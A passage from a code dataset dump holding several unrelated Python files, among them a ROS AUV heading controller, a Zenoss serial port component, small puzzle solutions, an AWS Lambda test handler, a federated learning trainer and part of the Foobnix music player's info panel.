%(controlRate,1/timeElapse) \n rospy.logwarn(str)\n pubMissionLog.publish(str)\n\n################################################################################\n######## CALCULATE CURRENT SYSTEM STATES #######################################\n################################################################################\n\ndef system_state(dt,heading_current,heading_demand):\n global HC\n global int_error\n global sample\n\n if dt == -1:\n sample = numpy.zeros(2)\n error = 0\n int_error = 0\n der_sample = 0\n else:\n ### ERROR ###\n error = myUti.computeHeadingError(heading_demand,heading_current)\n ### INTEGRAL ###\n int_error += dt*error\n ### DERIVATIVE ###\n # PI-D strategy (compute the derivative of only the current heading)\n sample[1] = sample[0]\t # Shift old values up in the array\n sample[0] = heading_current \t\t # Set first array term to new error value\n der_sample = myUti.computeHeadingError(sample[0],sample[1])/dt # compute error of the sample\n\n # update the error terms. These will be subscribed by the logger node.\n der_error = der_sample # consider the derivative of sample as the derivative of the error (c.f. PI-D strategy)\n\n HC.error = error\n HC.int_error = int_error\n HC.der_error = der_error\n\n return [error, int_error, der_error]\n\n################################################################################\n######## UPDATE PARAMETERS FROM TOPICS #########################################\n################################################################################\n\ndef heading_demand_cb(headingd):\n global HC\n global controller_onOff\n global timeLastCallback\n HC.heading_demand = headingd.data\n controller_onOff = True\n timeLastCallback = time.time()\n \ndef sway_demand_cb(swaydemand):\n global HC\n HC.sway_demand = swaydemand.data\n\ndef compass_cb(compass):\n global HC\n HC.heading = compass.heading\n \n################################################################################\n######## SPEED OBSERVER ########################################################\n################################################################################\n\ndef prop_demand_callback(propd):\n global propDemand\n global timeLastDemandProp\n propDemand = propd.data\n timeLastDemandProp = time.time()\n\ndef propeller_model(u_prop,_speed):\n if numpy.abs(u_prop)<10: # deadband\n F_prop = 0\n else:\n # propeller model based on Turnock2010 e.q. 16.19\n Kt0 = 0.1003\n a = 0.6952\n b = 1.6143\n w_t = 0.36 # wake fraction\n t = 0.11 # thrust deduction\n D = 0.305 # peopeller diameter [m]\n rho = 1000 # water density [kg/m^3]\n \n rps = 0.2748*u_prop - 0.1657 # infer propeller rotation speed from the propeller demand [rps]\n \n J = _speed *(1-w_t)/rps/D;\n Kt = Kt0*(1 - (J/a)**b );\n F_prop = rho*rps**2*D**4*Kt*(1-t);\n\n return F_prop\n\ndef rigidbodyDynamics(_speed,F_prop):\n m = 79.2 # mass of the AUV [kg]\n X_u_dot = -3.46873716858361 # added mass of the AUV [kg]\n X_u = -16.2208 # linear damping coefficient [kg/s]\n X_uu = -1.2088 # quadratic damping coefficient [kg/m]\n \n acc = (X_u*_speed + X_uu*abs(_speed)*_speed + F_prop)/(m-X_u_dot)\n \n return acc\n \ndef speedObserver(u_prop,_speed,dt):\n # compute force from a propeller demand\n F_prop = propeller_model(u_prop,_speed)\n # implement Runge-Kutta 4th order to update the AUV speed\n k1 = rigidbodyDynamics(_speed,F_prop)\n k2 = rigidbodyDynamics(_speed+dt/2.*k1,F_prop)\n k3 = rigidbodyDynamics(_speed+dt/2.*k2,F_prop)\n k4 = rigidbodyDynamics(_speed+dt*k3,F_prop)\n\n speed_change = dt/6.*(k1+2*k2+2*k3+k4)\n _speed = _speed + speed_change\n return _speed\n \n################################################################################\n######## INITIALISATION ########################################################\n################################################################################\n\nif __name__ == '__main__':\n rospy.init_node('Heading_controller')\n \n global HC\n HC = heading_control_PID()\n \n rospy.Subscriber('heading_demand', Float32, heading_demand_cb)\n rospy.Subscriber('sway_demand', Float32, sway_demand_cb)\n rospy.Subscriber('compass_out', compass, compass_cb)\n rospy.Subscriber('prop_demand', Int8, prop_demand_callback)\n \n pub_tsl = rospy.Publisher('TSL_setpoints_horizontal', tsl_setpoints)\n pub_tail = rospy.Publisher('tail_setpoints_vertical', tail_setpoints)\n pub_HC = rospy.Publisher('Heading_controller_values_PID', heading_control_PID)\n pubMissionLog = rospy.Publisher('MissionStrings', String)\n pubStatus = rospy.Publisher('status', status)\n \n rospy.loginfo(\"Heading controller online\")\n\n main_control_loop()\n","repo_name":"Southampton-Maritime-Robotics/DelphinROSv3","sub_path":"src/lowlevel_controllers/scripts/heading_controller_PID.py","file_name":"heading_controller_PID.py","file_ext":"py","file_size_in_byte":13958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38573216648","text":"###############################################################################\n#\n# SerialPort object class\n#\n###############################################################################\n\n__doc__ = \"\"\" SerialPort\n\nSerialPort is a component of a SerialConsoleDevice\n\n$id: $\"\"\"\n\n__version__ = \"$Revision: 1.3 $\"[11:-2]\n\nfrom Globals import InitializeClass\n# from AccessControl import ClassSecurityInfo\n\nfrom Products.ZenRelations.RelSchema import *\nfrom Products.ZenModel.DeviceComponent import DeviceComponent\nfrom Products.ZenModel.ManagedEntity import ManagedEntity\nfrom Products.ZenUtils.Utils import convToUnits\n\nfrom Products.ZenModel.ZenossSecurity import ZEN_VIEW, ZEN_CHANGE_SETTINGS\n\n_kw = dict(mode='w')\n\nclass SerialPort(DeviceComponent, ManagedEntity):\n \"\"\" Serial console on an Opengear device\n\n \"\"\"\n\n portal_type = meta_type = 'SerialPort'\n\n #serialPortIndex = -1\n serialPortNumber = 0\n serialPortLabel = \"\"\n serialPortMode = \"\"\n serialPortLoglevel = 0\n serialPortSpeed = 0\n serialPortCharsize = 0\n serialPortStop = 0\n serialPortParity = \"\"\n serialPortFlowcontrol = \"\"\n serialPortProtocol = \"\"\n serialPortTerminal = \"\"\n serialPortSsh = False\n serialPortTelnet = False\n serialPortRfc2217 = False\n serialPortRawtcp = False\n serialPortModeSummary = \"\"\n serialPortSettingSummary = \"\"\n\n ogSerialPortStatusIndex = -1\n ogSerialPortStatusPort = 0\n ogSerialPortStatusRxBytes = 0\n ogSerialPortStatusTxBytes = 0\n ogSerialPortStatusSpeed = 0\n ogSerialPortStatusDCD = 0\n ogSerialPortStatusDTR = 0\n ogSerialPortStatusDSR = 0\n ogSerialPortStatusCTS = 0\n ogSerialPortStatusRTS = 0\n #dcd = False\n #dtr = False\n #dsr = False\n #cts = False\n #rts = False\n\n snmpindex = -1\n\n _properties = (\n #dict(id = 'snmpindex', type = 'int', **_kw),\n dict(id = 'serialPortNumber', type = 'int', **_kw),\n dict(id = 'serialPortLabel', type = 'string', **_kw),\n dict(id = 'serialPortMode', type = 'string', **_kw),\n dict(id = 'serialPortLoglevel', type = 'int', **_kw),\n dict(id = 'serialPortSpeed', type = 'int', **_kw),\n dict(id = 'serialPortCharsize', type = 'int', **_kw),\n dict(id = 'serialPortStop', type = 'int', **_kw),\n dict(id = 'serialPortParity', type = 'string', **_kw),\n dict(id = 'serialPortFlowcontrol', type = 'string', **_kw),\n dict(id = 'serialPortProtocol', type = 'string', **_kw),\n dict(id = 'serialPortTerminal', type = 'string', **_kw),\n dict(id = 'serialPortSsh', type = 'boolean', **_kw),\n dict(id = 'serialPortTelnet', type = 'boolean', **_kw),\n dict(id = 'serialPortRfc2217', type = 'boolean', **_kw),\n dict(id = 'serialPortRawtcp', type = 'boolean', **_kw),\n dict(id = 'serialPortModeSummary', type = 'string', **_kw),\n dict(id = 'serialPortSettingSummary',type = 'string', **_kw),\n dict(id = 'ogSerialPortStatusIndex', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusPort', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusRxBytes', type = 'int',\t **_kw),\n dict(id = 'ogSerialPortStatusTxBytes', type = 'int',\t **_kw),\n dict(id = 'ogSerialPortStatusSpeed', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusDCD', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusDTR', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusDSR', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusCTS', type = 'int', **_kw),\n dict(id = 'ogSerialPortStatusRTS', type = 'int', **_kw),\n #dict(id = 'dcd', type = 'boolean', **_kw),\n #dict(id = 'dtr', type = 'boolean', **_kw),\n #dict(id = 'dsr', type = 'boolean', **_kw),\n #dict(id = 'cts', type = 'boolean', **_kw),\n #dict(id = 'rts', type = 'boolean', **_kw),\n )\n\n _relations = (\n ('SerialConsoleDev', ToOne(ToManyCont,\n 'ZenPacks.Opengear.ConsoleServer.SerialConsoleDevice',\n 'SerialPrt')),\n )\n\n # Screen action bindings (and tab definitions)\n factory_type_information = ({\n 'id' : 'SerialPort',\n 'meta_type' : 'SerialPort',\n 'description' : 'Opengear Serial Port',\n 'icon' : 'Device_icon.gif',\n 'product' : 'ConsoleServer',\n 'factory' : 'manage_addSerialPort',\n 'immediate_view' : 'serialPortPerformance',\n 'actions' : ({\n 'id' : 'perf',\n 'name' : 'perf',\n 'action' : 'serialPortPerformance',\n 'permissions' : (ZEN_VIEW, )\n }, {\n 'id' : 'templates',\n 'name' : 'Templates',\n 'action' : 'objTemplates',\n 'permissions' : (ZEN_CHANGE_SETTINGS, )\n },)\n },)\n\n def device(self):\n return self.SerialConsoleDev()\n\n def managedDeviceLink(self):\n from Products.ZenModel.ZenModelRM import ZenModelRM\n d = self.getDmdRoot(\"Devices\").findDevice(self.serialPortLabel)\n if d:\n return ZenModelRM.urlLink(d, 'link')\n return None\n\n def getPerformanceLink(self):\n from Products.ZenModel.ZenModelRM import ZenModelRM\n d = self.getDmdRoot(\"Devices\").findDevice(self.serialPortLabel)\n if d:\n return ZenModelRM.urlLink(d, 'link')\n return None\n\n def snmpIgnore(self):\n return ManagedEntity.snmpIgnore(self) or self.snmpindex < 0\n\nInitializeClass(SerialPort)\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.Opengear.ConsoleServer/ZenPacks/Opengear/ConsoleServer/SerialPort.py","file_name":"SerialPort.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"31643539924","text":"import time\n\"\"\"\n#this code works but takes a long time to calculate\n#the actual solution is purely mathematical.\ndict = {1: []}\ndef main():\n maximum = 0\n maxNum = 1\n limit = 1000000\n for n in range(2, limit + 1):\n print(n)\n if n not in dict.keys():\n newDict = {}\n for num in dict.keys():\n i = 1\n res = num * (n ** i)\n while res <= limit:\n newDict[res] = list(dict[num])\n newDict[res].append(n)\n i += 1\n res = num * (n ** i)\n keys = list(newDict.keys())\n for j in range(len(keys)):\n dict[keys[j]] = newDict[keys[j]]\n if n / (n - getNumOfCommons(dict[n], n) - 1) > maximum:\n maxNum = n\n maximum = n / (n - getNumOfCommons(dict[n], n) - 1)\n #print(f\"n: {n}\\t{maximum}\")\n print(f\"maxNum: {maxNum}\\tvalue: {maximum}\")\n\ndef getNumOfCommons(list, n):\n sum = 0\n for i in range(len(list)):\n sum += int(n / list[i]) - 1\n for i in range(len(list)):\n for j in range(i + 1, len(list)):\n sum -= int(n / (list[i] * list[j])) - 1\n return sum\n\n\"\"\"\ndef main():\n n = 1\n k = 0\n primes = [2, 3, 5, 7, 11, 13, 17, 19, 21, 23, 29, 31]\n while primes[k] * n <= 1000000:\n n *= primes[k]\n k += 1\n print(n)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Penjo989/Project-Euler","sub_path":"10/69.py","file_name":"69.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"817656999","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n ## RC ##\n ## APPROACH : BACKTRACKING ##\n\n ## TIME COMPLEXITY : O(N^2) ##\n ## SPACE COMPLEXITY : O(N^2) ##\n\n def backtrack(curr, nums):\n if (len(curr) >= 2 and curr[-1] < curr[-2]): return\n if (len(curr) >= 2 and curr[:] not in result):\n result.add(curr[:])\n for i in range(len(nums)):\n backtrack(curr + (nums[i],), nums[i + 1:]) # using tuples for curr instead of list\n\n result = set()\n backtrack((), nums)\n return result","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"increasing-subsequences.py","file_name":"increasing-subsequences.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19020566981","text":"import h5py\nimport sys\nimport numpy\n\nfile_in = sys.argv[1]\nfile_out = sys.argv[2]\n\nfh_in = h5py.File(file_in, 'r')\ndata_in = fh_in['/data/data'][:]\nfh_in.close()\n\ndata_out = numpy.zeros((16*128, 512), dtype=numpy.int16)\n\nfor p_num in range(0, 16):\n\n print('Converting panel:', p_num)\n\n p_in = data_in[\n 512 * p_num:\n 512 * (p_num + 1),\n\n 0:128\n ]\n\n p_out = data_out[\n 128 * p_num:\n 128 * (p_num + 1),\n\n 0:512\n ]\n\n for y in range(0, 128):\n for x in range(0, 512):\n p_out[y,x] = p_in[x,y]\n\nfh_out = h5py.File(file_out, 'w')\nfh_out.create_dataset('/data/data', data=data_out)\nprint('Done!')","repo_name":"valmar/om-configuration-archive","sub_path":"onda-wang-xfel2114-2018-september/cheetah_onda_mask_converter.py","file_name":"cheetah_onda_mask_converter.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20249237840","text":"import json\nimport os\nfrom log import logger\n\nimport boto3\n\ndynamodb = boto3.client('dynamodb', endpoint_url='http://dynamodb:8000')\nsqs = boto3.client('sqs', endpoint_url='http://localstack:4576/')\n\ndef lambda_handler(event, context):\n response = dynamodb.put_item(\n TableName='example',\n Item={\n 'id': {'S': 'ABC'},\n 'name': {'S': 'jayground'}\n }\n )\n logger.info(response)\n\n response = sqs.send_message(\n QueueUrl=os.environ.get('QUEUE_URL', \"http://localhost:4576/queue/exSQS\"),\n MessageBody='Serverless black belt!'\n )\n\n logger.info(response)\n\n return {\n \"statusCode\": 201,\n \"body\": json.dumps({'msg': 'success to put item'})\n }","repo_name":"jaemyunlee/playground","sub_path":"09-black-belt-for-sam-local/lambda2/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13423968182","text":"\nclass FitTrackPoint(object):\n def __init__(self, frame):\n self.value = self.get_single_point_data(frame)\n\n def get_single_point_data(self, frame):\n data = dict()\n if not(frame.has_field('position_lat') and frame.has_field('position_long')):\n return None\n latitude = frame.get_value('position_lat')\n longitude = frame.get_value('position_long')\n if (latitude is None) or (longitude is None):\n return None\n data[\"latitude\"] = latitude\n data[\"longitude\"] = longitude\n return data\n","repo_name":"bartvanherck/sportstatistics","sub_path":"fitness/fittrackpoint.py","file_name":"fittrackpoint.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70579538153","text":"import numpy as np\nimport wandb\nfrom loguru import logger\n\nfrom utils.utils import test, initWandb\n\n\nclass Training:\n\n def __init__(self, args, net_glob, dataset_train, dataset_test, dict_users):\n\n self.round = 0\n self.args = args\n self.net_glob = net_glob\n self.net_glob.train()\n self.dataset_train = dataset_train\n self.dataset_test = dataset_test\n self.dict_users = dict_users\n\n self.acc_list = []\n self.acc = 0\n self.loss = 0\n self.max_avg = 0\n self.max_std = 0\n\n self.traffic = 0\n\n if args.wandb:\n initWandb(args)\n\n def test(self):\n self.acc, self.loss = test(self.net_glob, self.dataset_test, self.args)\n self.acc_list.append(self.acc)\n temp = self.acc_list[max(0, len(self.acc_list) - 10)::]\n avg = np.mean(temp)\n if avg > self.max_avg:\n self.max_avg = avg\n self.max_std = np.std(temp)\n\n def log(self):\n logger.info(\n \"Round{}, acc:{:.2f}, max_avg:{:.2f}, max_std:{:.2f}, loss:{:.2f}, comm:{:.2f}MB\",\n self.round, self.acc, self.max_avg, self.max_std,\n self.loss, (self.traffic / 1024 / 1024))\n if self.args.wandb:\n wandb.log({\"round\": self.round, 'acc': self.acc, 'max_avg': self.max_avg,\n \"max_std\": self.max_std, \"loss\": self.loss,\n \"comm\": (self.traffic / 1024 / 1024)})\n\n","repo_name":"chooise/federated_learning","sub_path":"Algorithm/Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3291986156","text":"def deliteli(n):\n maxChet = 0\n maxNechet = 0\n m = []\n for l in range(2, int(n ** 0.5) + 1):\n if n % l == 0:\n m.append([n // l, l])\n if l % 2 == 0:\n maxChet = max(maxChet, l)\n elif l % 2 == 1:\n maxNechet = max(maxNechet, l)\n if ((n // l) % 2) == 0:\n maxChet = max(maxChet, n // l)\n elif ((n // l) % 2) == 1:\n maxNechet = max(maxNechet, n // l)\n if maxChet == 0 or maxNechet == 0:\n return [False, 0]\n A = abs(maxChet - maxNechet)\n lll = deliteliProst(A)\n if lll == 0 and str(A)[-1] == \"9\":\n return [True, A]\n return [False, 0]\n\n\ndef deliteliProst(n):\n spisok = set()\n for g in range(2, int(n ** 0.5) + 1):\n if n % g == 0:\n spisok.add(g)\n spisok.add(n // g)\n return len(list(spisok))\nk = 0\nfor i in range(250157, 10000000):\n jjj = deliteli(i)\n if k == 5:\n break\n if jjj[0]:\n print(i, jjj[1])\n k += 1","repo_name":"olgaObnosova/EGE","sub_path":"№25/4210.py","file_name":"4210.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73116505512","text":"'''\nCreated on Sep 23, 2010\n\n@author: ivan\n'''\nimport os\nimport copy\nimport logging\nimport threading\n\nfrom gi.repository import Gtk\nfrom gi.repository import GLib\n\nfrom foobnix.fc.fc import FC\nfrom foobnix.gui.model import FModel\nfrom foobnix.gui.state import LoadSave\nfrom foobnix.helpers.image import ImageBase\nfrom foobnix.helpers.textarea import TextArea\nfrom foobnix.gui.model.signal import FControl\nfrom foobnix.helpers.my_widgets import EventLabel\nfrom foobnix.helpers.pref_widgets import HBoxDecoratorTrue, FrameDecorator\nfrom foobnix.fc.fc_cache import FCache, COVERS_DIR, LYRICS_DIR\nfrom foobnix.gui.treeview.simple_tree import SimpleTreeControl\nfrom foobnix.util import idle_task\nfrom foobnix.util.const import FTYPE_NOT_UPDATE_INFO_PANEL, \\\n ICON_BLANK_DISK, SITE_LOCALE\nfrom foobnix.util.bean_utils import update_parent_for_beans, \\\n update_bean_from_normalized_text\nfrom foobnix.thirdparty.lyr import get_lyrics\nfrom foobnix.gui.service.lyrics_parsing_service import get_lyrics_by_parsing\nfrom foobnix.util.id3_util import get_image_for_bean\n\n\nclass InfoCache():\n def __init__(self):\n self.best_songs_bean = None\n self.similar_tracks_bean = None\n self.similar_artists_bean = None\n self.similar_tags_bean = None\n self.lyric_bean = None\n self.wiki_artist = None\n\n self.active_method = None\n\n\nclass InfoPanelWidget(Gtk.Frame, LoadSave, FControl):\n def __init__(self, controls):\n Gtk.Frame.__init__(self)\n FControl.__init__(self, controls)\n\n self.album_label = Gtk.Label.new(None)\n self.album_label.set_line_wrap(True)\n self.album_label.set_markup(\"\")\n self.set_label_widget(self.album_label)\n\n self.empty = TextArea()\n\n self.best_songs = SimpleTreeControl(_(\"Best Songs\"), controls)\n self.best_songs.line_title = EventLabel(self.best_songs.get_title(), func=self.show_current,\n arg=self.best_songs, func1=self.show_best_songs)\n\n self.artists = SimpleTreeControl(_(\"Similar Artists\"), controls)\n self.artists.line_title = EventLabel(self.artists.get_title(), func=self.show_current,\n arg=self.artists, func1=self.show_similar_artists)\n\n self.tracks = SimpleTreeControl(_(\"Similar Songs\"), controls)\n self.tracks.line_title = EventLabel(self.tracks.get_title(), func=self.show_current,\n arg=self.tracks, func1=self.show_similar_tracks)\n\n self.tags = SimpleTreeControl(_(\"Similar Tags\"), controls)\n self.tags.line_title = EventLabel(self.tags.get_title(), func=self.show_current,\n arg=self.tags, func1=self.show_similar_tags)\n\n self.lyrics = TextArea()\n lyric_title = _(\"Lyrics\")\n self.lyrics.set_text(\"\", lyric_title)\n self.lyrics.line_title = EventLabel(lyric_title, func=self.show_current,\n arg=self.lyrics, func1=self.show_similar_lyrics)\n\n \"\"\"wiki\"\"\"\n wBox = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n wiki_title = _(\"About Artist\")\n self.wiki = TextArea()\n\n wBox.line_title = EventLabel(wiki_title, func=self.show_current, arg=wBox, func1=self.show_wiki_info)\n\n \"\"\"info\"\"\"\n self.last_fm_label = Gtk.LinkButton.new_with_label(\"http://www.last.fm\", \"Last.Fm\")\n self.wiki_label = Gtk.LinkButton.new_with_label(\"http://www.wikipedia.org\", \"Wikipedia\")\n info_line = HBoxDecoratorTrue(self.last_fm_label, self.wiki_label)\n info_frame = FrameDecorator(_(\"Info\"), info_line, 0.5, 0.5)\n\n \"\"\"downloads\"\"\"\n self.exua_label = Gtk.LinkButton.new_with_label(\"http://www.ex.ua\", \"EX.ua\")\n self.rutracker_label = Gtk.LinkButton.new_with_label(\"http://rutracker.org\", \"Rutracker\")\n dm_line = HBoxDecoratorTrue(self.exua_label, self.rutracker_label)\n dm_frame = FrameDecorator(_(\"Downloads\"), dm_line, 0.5, 0.5)\n\n self.wiki = TextArea()\n self.wiki.set_text(\"\", wiki_title)\n\n wBox.pack_start(HBoxDecoratorTrue(info_frame, dm_frame), False, False, 0)\n wBox.pack_start(self.wiki, True, True, 0)\n\n wBox.scroll = wBox\n\n self.vpaned_small = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n\n \"\"\"image and similar artists\"\"\"\n ibox = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 0)\n self.image = ImageBase(ICON_BLANK_DISK, FC().info_panel_image_size)\n\n lbox = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n\n self.left_widget = [wBox, self.artists, self.tracks, self.tags, self.lyrics, self.best_songs]\n\n for l_widget in self.left_widget:\n lbox.pack_start(l_widget.line_title, True, True, 0)\n\n ibox.pack_start(self.image, False, False, 0)\n ibox.pack_start(lbox, True, True, 0)\n\n \"\"\"image and similar artists\"\"\"\n sbox = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n\n for l_widget in self.left_widget:\n sbox.pack_start(l_widget.scroll, True, True, 0)\n\n sbox.pack_end(self.empty.scroll, True, True, 0)\n\n self.vpaned_small.pack_start(ibox, False, False, 0)\n self.vpaned_small.pack_start(sbox, True, True, 0)\n\n self.add(self.vpaned_small)\n\n self.bean = None\n self.info_cache = InfoCache()\n self.update_lock = threading.Lock()\n self.clear()\n\n @idle_task\n def show_current(self, widget):\n if not self.controls.net_wrapper.is_internet():\n return\n\n self.empty.hide()\n if widget.line_title.selected:\n widget.scroll.hide()\n self.empty.show()\n widget.line_title.set_not_active()\n return\n\n for w in self.left_widget:\n w.scroll.hide()\n w.line_title.set_not_active()\n\n widget.scroll.show_all()\n widget.line_title.set_active()\n\n self.info_cache.active_method = widget.line_title.func1\n self.controls.in_thread.run_with_spinner(widget.line_title.func1)\n\n def clear(self):\n self.image.set_no_image()\n self.tracks.clear_tree()\n self.tags.clear_tree()\n self.artists.clear_tree()\n self.lyrics.set_text(\"\", _(\"Lyrics\"))\n\n def update_info_panel(self):\n if not self.controls.net_wrapper.is_internet() or not self.bean:\n return\n\n bean = copy.copy(self.bean)\n\n def update_info_panel_task():\n self.update_lock.acquire()\n try:\n self.show_album_title(bean)\n self.show_disc_cover(bean)\n if self.controls.coverlyrics.get_property(\"visible\"):\n try:\n self.show_similar_lyrics(bean)\n except Exception as e:\n logging.error(\"Can't get lyrics. \" + type(e).__name__ + \": \" + e.message)\n if self.info_cache.active_method:\n self.info_cache.active_method()\n except:\n pass\n self.update_lock.release()\n\n threading.Thread(target=update_info_panel_task).start()\n\n def update(self, bean):\n if bean.type == FTYPE_NOT_UPDATE_INFO_PANEL:\n return False\n\n self.clear()\n\n if not self.controls.net_wrapper.is_internet():\n return\n\n if not FC().is_view_info_panel:\n logging.debug(\"Info panel disabled\")\n return\n\n \"\"\"check connection\"\"\"\n if not self.controls.lastfm_service.connect():\n return\n\n \"\"\"update bean info form text if possible\"\"\"\n bean = update_bean_from_normalized_text(bean)\n\n if not bean.artist or not bean.title:\n logging.debug(\"Artist and title not defined\")\n\n self.bean = bean\n\n self.update_info_panel()\n\n def show_album_title(self, bean=None):\n if not bean:\n bean = self.bean\n if bean.UUID != self.bean.UUID:\n return\n\n \"\"\"update info album and year\"\"\"\n info_line = bean.artist\n if bean.text in FCache().album_titles:\n info_line = FCache().album_titles[bean.text]\n else:\n album_name = self.controls.lastfm_service.get_album_name(bean.artist, bean.title)\n album_year = self.controls.lastfm_service.get_album_year(bean.artist, bean.title)\n if album_name:\n info_line = album_name\n if album_name and album_year:\n info_line = album_name + \" (\" + album_year + \")\"\n\n if isinstance(info_line, str):\n FCache().album_titles[bean.text] = info_line\n if info_line and bean.UUID == self.bean.UUID:\n info_line = info_line.replace('&', '&')\n GLib.idle_add(self.album_label.set_markup, \"%s\" % info_line)\n GLib.idle_add(self.controls.coverlyrics.album_title.set_markup, \"%s\" % info_line)\n\n def show_disc_cover(self, bean=None):\n if not bean:\n bean = self.bean\n if bean.UUID != self.bean.UUID:\n return\n\n \"\"\"update image\"\"\"\n if not bean.image:\n if not os.path.isdir(COVERS_DIR):\n os.mkdir(COVERS_DIR)\n bean.image = get_image_for_bean(bean, self.controls)\n\n if not bean.image:\n logging.warning(\"\"\"\"\"Can't get cover image. Check the correctness of the artist's name and track title\"\"\"\"\")\n\n if bean.UUID == self.bean.UUID:\n self.image.update_info_from(bean)\n self.controls.trayicon.update_info_from(bean)\n self.controls.coverlyrics.set_cover()\n\n def show_similar_lyrics(self, bean=None):\n if not bean:\n bean = self.bean\n if not bean:\n return\n if bean.UUID != self.bean.UUID:\n return\n\n \"\"\"lyrics\"\"\"\n if not os.path.isdir(LYRICS_DIR):\n os.mkdir(LYRICS_DIR)\n\n cache_name = lyrics_title = \"%s - %s\" % (bean.artist, bean.title)\n\n illegal_chars = [\"/\", \"#\", \";\", \":\", \"%\", \"*\", \"&\", \"\\\\\"]\n for char in illegal_chars:\n cache_name = cache_name.replace(char, \"_\")\n cache_name = cache_name.lower().strip()\n\n text = None\n\n if os.path.exists(os.path.join(LYRICS_DIR, cache_name)):\n with open(os.path.join(LYRICS_DIR, cache_name), 'r') as cache_file:\n text = \"\".join(cache_file.readlines())\n else:\n self.lyrics.set_text(_(\"Loading...\"), lyrics_title)\n try:\n logging.debug(\"Try to get lyrics from lyrics.wikia.com\")\n text = get_lyrics(bean.artist, bean.title)\n except:\n logging.info(\"Error occurred when getting lyrics from lyrics.wikia.com\")\n if not text:\n text = get_lyrics_by_parsing(bean.artist, bean.title)\n if text:\n with open(os.path.join(LYRICS_DIR, cache_name), 'w') as cache_file:\n cache_file.write(text)\n else:\n logging.info(\"The text not found\")\n text = _(\"The text not found\")\n if bean.UUID == self.bean.UUID:\n self.set_lyrics(text, lyrics_title)\n\n def show_wiki_info(self):\n if not self.bean:\n return\n if self.info_cache.wiki_artist == self.bean.artist:\n return None\n self.info_cache.wiki_artist = self.bean.artist\n\n self.wiki_label.set_uri(\"http://%s.wikipedia.org/w/index.php?&search=%s\" % (SITE_LOCALE, self.bean.artist))\n self.last_fm_label.set_uri(\"http://www.last.fm/search?q=%s\" % self.bean.artist)\n\n self.exua_label.set_uri(\"http://www.ex.ua/search?s=%s\" % self.bean.artist)\n self.rutracker_label.set_uri(\"http://rutracker.org/forum/tracker.php?nm=%s\" % self.bean.artist)\n\n artist = self.controls.lastfm_service.get_network().get_artist(self.bean.artist)\n self.wiki.set_text(artist.get_bio_summary(), self.bean.artist)\n\n# Deprecated\n# images = artist.get_images(limit=6)\n#\n# for image in images:\n# try:\n# url = image.sizes.large\n# except AttributeError:\n# url = image.sizes[\"large\"]\n# self.wiki.append_image(url)\n\n def show_similar_tags(self):\n if self.info_cache.similar_tags_bean == self.bean:\n return None\n self.info_cache.similar_tags_bean = self.bean\n\n \"\"\"similar tags\"\"\"\n similar_tags = self.controls.lastfm_service.search_top_similar_tags(self.bean.artist, self.bean.title)\n parent = FModel(_(\"Similar Tags:\") + \" \" + self.bean.title)\n update_parent_for_beans(similar_tags, parent)\n self.tags.populate_all([parent] + similar_tags)\n\n def show_similar_tracks(self):\n if self.info_cache.similar_tracks_bean == self.bean:\n return None\n self.info_cache.similar_tracks_bean = self.bean\n\n \"\"\"similar songs\"\"\"\n similar_tracks = self.controls.lastfm_service.search_top_similar_tracks(self.bean.artist, self.bean.title)\n parent = FModel(_(\"Similar Tracks:\") + \" \" + self.bean.title)\n update_parent_for_beans(similar_tracks, parent)\n self.tracks.populate_all([parent] + similar_tracks)\n\n def show_similar_artists(self):\n if self.info_cache.similar_artists_bean == self.bean:\n return None\n self.info_cache.similar_artists_bean = self.bean\n\n \"\"\"similar artists\"\"\"\n if self.bean.artist:\n similar_artists = self.controls.lastfm_service.search_top_similar_artist(self.bean.artist)\n parent = FModel(_(\"Similar Artists:\") + \" \" + self.bean.artist)\n update_parent_for_beans(similar_artists, parent)\n self.artists.populate_all([parent] + similar_artists)\n\n def show_best_songs(self):\n if self.info_cache.best_songs_bean == self.bean:\n return None\n\n self.info_cache.best_songs_bean = self.bean\n\n best_songs = self.controls.lastfm_service.search_top_tracks(self.bean.artist)\n parent = FModel(_(\"Best Songs:\") + \" \" + self.bean.artist)\n update_parent_for_beans(best_songs, parent)\n self.best_songs.populate_all([parent] + best_songs)\n\n @idle_task\n def set_lyrics(self, text, title):\n self.lyrics.set_text(text, title)\n self.controls.coverlyrics.lyrics.set_text(text, title)\n\n def on_load(self):\n for w in self.left_widget:\n w.scroll.hide()\n w.line_title.set_not_active()\n self.empty.show()\n FCache().on_load()\n\n def on_save(self):\n pass\n\n def on_quit(self):\n 